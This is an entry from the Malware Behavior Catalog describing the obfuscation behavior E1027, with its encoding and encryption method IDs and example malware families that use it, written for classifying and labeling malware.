| ID | E1027 |
| Objective(s) | Anti-Static Analysis, Defense Evasion |
| Related ATT&CK Techniques | Obfuscated Files or Information (T1027, T1406) |
| Anti-Analysis Type | Evasion |
| Version | 2.0 |
| Created | 1 August 2019 |
| Last Modified | 21 November 2022 |
Malware may make files or information difficult to discover or analyze by encoding, encrypting, or otherwise obfuscating the content. In addition, a malware sample itself can be encoded or encrypted (i.e., encoding/encryption is a code characteristic).
A related MBC behavior (code characteristic), associated explicitly with executable code and making its analysis more difficult, is Executable Code Obfuscation (B0032).
Another related MBC behavior (code characteristic), is Software Packing (F0001) which has methods capturing specific packers and types of compression.
See ATT&CK: Obfuscated Files or Information (T1027, T1406).
Instead of being listed alphabetically, methods have been grouped to better faciliate labeling and mapping.
| Name | ID | Description |
|---|---|---|
| Encoding | E1027.m01 | A malware sample, file, or other information is encoded. |
| Encoding-Custom Algorithm | E1027.m03 | A custom algorithm is used to encode a malware sample, file or other information. |
| Encoding-Standard Algorithm | E1027.m02 | A standard algorithm (e.g., base64) is used to encode a malware sample, file, or other information. |
| Encryption | E1027.m04 | A malware sample, file, or other information is encrypted. |
| Encryption-Custom Algorithm | E1027.m08 | A custom algorithm is used to encrypt a malware sample, file, or other information. |
| Encryption-Standard Algorithm | E1027.m05 | A standard algorithm (e.g., Rijndael/AES, DES, RC4) is used to encrypt a malware sample, file, or other information. |
| Encryption of Code | E1027.m06 | A file's executable code is encrypted, but not necessarily the file's data. |
| Encryption of Data | E1027.m07 | A file's data is encrypted, but not necessarily the file's code. |
| Name | Date | Method | Description |
|---|---|---|---|
| TrickBot | 2016 | -- | Trojan spyware program that has mainly been used for targeting banking sites. |
| Poison Ivy | 2005 | -- | Obfuscates files. |
| WebCobra | 2018 | -- | Obfuscates files. |
| GotBotKR | 2019 | -- | GoBotKR uses base64 to obfuscate strings, commands and files. [1] |
| Kovter | 2016 | -- | The malware will use a key to decrypt text from a URL to create more malicious code [2] |
| Netwalker | 2020 | -- | Netwalker is obfuscated with several layers of encoding, obfuscation, and encryption techniques such as base64, hexademcimal, and XOR [3] |
[1] https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
[2] https://www.bleepingcomputer.com/virus-removal/remove-kovter-trojan
[3] https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflective-loading.html